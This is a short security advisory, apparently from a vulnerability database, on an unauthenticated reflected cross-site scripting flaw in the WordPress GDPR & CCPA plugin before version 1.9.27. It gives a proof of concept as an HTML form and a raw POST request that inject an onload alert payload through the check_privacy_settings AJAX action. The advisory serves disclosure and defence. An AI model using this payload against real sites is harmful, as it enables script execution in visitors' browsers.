WordPress GDPR & CCPA < 1.9.27 - Unauthenticated Reflected Cross-Site Scripting

Description

The check_privacy_settings AJAX action of the plugin, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)

Proof of Concept

<html>

  <body>

    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">

      <input type="hidden" name="action" value="check_privacy_settings" />

      <input type="hidden" name="settings[40]" value="40" />

      <input type="hidden" name="settings[41]" value="<body onload=alert(`XSS`)>" />

      <input type="hidden" name="nonce" value="XXXX" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>





POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 115

Connection: close

Upgrade-Insecure-Requests: 1



action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(`XSS`)%3e&nonce=XXXX 

References

https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059